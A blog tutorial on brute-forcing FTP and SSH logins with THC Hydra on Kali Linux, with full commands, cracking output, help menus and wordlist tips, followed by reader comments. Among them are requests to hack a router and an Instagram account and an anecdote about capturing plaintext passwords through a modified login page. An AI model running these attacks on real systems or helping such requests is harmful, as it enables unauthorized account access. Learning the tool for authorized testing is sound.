blackMORE Ops Learn one trick a day ….
For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as a target service and will show how to crack passwords in Kali Linux with Hydra. 
There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallelized connects. We’ve previously covered password cracking using John the Ripper, Wireshark,NMAP and MiTM.
Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently THC Hydra tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.Supported Platforms
- All UNIX platforms (linux, *bsd, solaris, etc.)
- Mac OS/X
- Windows with Cygwin (both IPv4 and IPv6)
- Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.
For brute forcing Hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with John the Ripper which is another password cracking tool. Other password lists are available online, simply Google it.
The password list s pre-installed on Kali Linux and its password list can be found at the following location
/usr/share/john/password.lst
It looks like this
#!comment: This list has been compiled by Solar Designer of Openwall Project, #!comment: http://www.openwall.com/wordlists/ #!comment: #!comment: This list is based on passwords most commonly seen on a set of Unix #!comment: systems in mid-1990's, sorted for decreasing number of occurrences #!comment: (that is, more common passwords are listed first). It has been #!comment: revised to also include common website passwords from public lists #!comment: of "top N passwords" from major community website compromises that #!comment: occurred in 2006 through 2010. #!comment: #!comment: Last update: 2011/11/20 (3546 entries) 123456 12345 password password1 123456789 12345678 1234567890
Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our word list of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.
Here is the simple command with output
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18 [DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task [DATA] attacking service ftp on port 21 [VERBOSE] Resolving addresses ... done [ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0] [ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0] [ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0] [21][ftp] host: 192.168.1.1 login: admin password: password [STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33 root@kali:~#
Check the line “[21][ftp]”. It mentions the username/password combination that worked for the ftp server. Quite easy!
Now lets take a look at the options. The t option tells how many parallel threads Hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this its better to do 1 attempt at a time. The next option is “l” which tells the username or login to use. In this case its admin. Next comes the capital “P” option which provides the word list to use. Hydra will pickup each line as a single password and use it.
The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/IP address followed by the service to crack.
THC hydra help menu - click to expand
root@kali:~# hydra -h
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
% export HYDRA_PROXY_HTTP=http://proxy:8080
% export HYDRA_PROXY_AUTH=user:pass
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
hydra Usage Example
Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123):
root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123 Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33 [DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task [DATA] attacking service ssh on port 22
Brute forcing is the most basic form of password cracking techniques. In works well with devices like routers etc which are mostly configured with their default passwords. However when it comes to other systems, brute forcing will not work unless you are too lucky.
However still brute forcing is a good practice for hackers so you should keep trying all techniques to hack a system. So keep hacking!!
Additional tools bundled with THC Hydra
pw-inspector
It reads passwords in and prints those which meets the requirements
pw-inspector help menu - click to expand
root@kali:~# pw-inspector PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org] Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s Options: -i FILE file to read passwords from (default: stdin) -o FILE file to write valid passwords to (default: stdout) -m MINLEN minimum length of a valid password -M MAXLEN maximum length of a valid password -c MINSETS the minimum number of sets required (default: all given) Sets: -l lowcase characters (a,b,c,d, etc.) -u upcase characters (A,B,C,D, etc.) -n numbers (1,2,3,4, etc.) -p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.) -s special characters - all others not withint the sets above PW-Inspector reads passwords in and prints those which meet the requirements. The return code is the number of valid passwords found, 0 if none was found. Use for security: check passwords, if 0 is returned, reject password choice. Use for hacking: trim your dictionary file to the pw requirements of the target. Usage only allowed for legal purposes.
pw-inspector Usage Example
Read in a list of passwords (-i /usr/share/wordlists/nmap.lst) and save to a file (-o /root/passes.txt), selecting passwords of a minimum length of 6 (-m 6) and a maximum length of 10 (-M 10): root@kali:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10 root@kali:~# wc -l /usr/share/wordlists/nmap.lst 5086 /usr/share/wordlists/nmap.lst root@kali:~# wc -l /root/passes.txt 4490 /root/passes.txt
Resources
Source: http://www.thc.org/thc-hydra/
- Author: Van Hauser, Roland Kessler
but you need wordlist :/
That is why the author mentioned people still making mistake of not making their password secure enough, basically this to get low hanging fruits for further recon
i want to hack a tenda 11n router by hydra its not have admin or username its only have password
inifconfig i cant find inet addr ? need help
use the command ip addr
when I type the command /usr/share/john/password.lst it is showing the permission denied
is there any solution
try “cp /usr/share/john/password.lst Desktop”
uh come back when you can bruteforce paswords such as aiVu/tiedae7aix9oeg%aeveipoo*nohquocheizee9Phae#mei:V3dooj=u*ibo in real time (or close to) on affordable hardware
bruh bruteforcing a password takes at least 14 hours for an average 7 letter password… you will have more success calling and asking them for their password
i know which this doesn’t seem very impressive to me
wordlists/rainbowtables can get huge fast, rainbowtables have problems of their own, foreign languages can make wordlists useless
and, like you said, bruteforcing takes a long time (we brute forced a few md5 hashes for our classes php board back in 2003 and the longest one we got was 7 chars long and took days on a dualcpu p3 450mhz), then i thought about it and just modified the login page to store the unencrypted password…. everyone wondered how we could do any password at once :)
i have getting this like cracking with hydra
We interviewed the developer of THC Hydra – thought you’d be interested to read their comments:
https://www.concise-courses.com/interview-thc-hydra/
How to install hydra on nethunter?
Very good article. I’m dealing with a few
of these issues as well..
plzz help me to hack instagram acc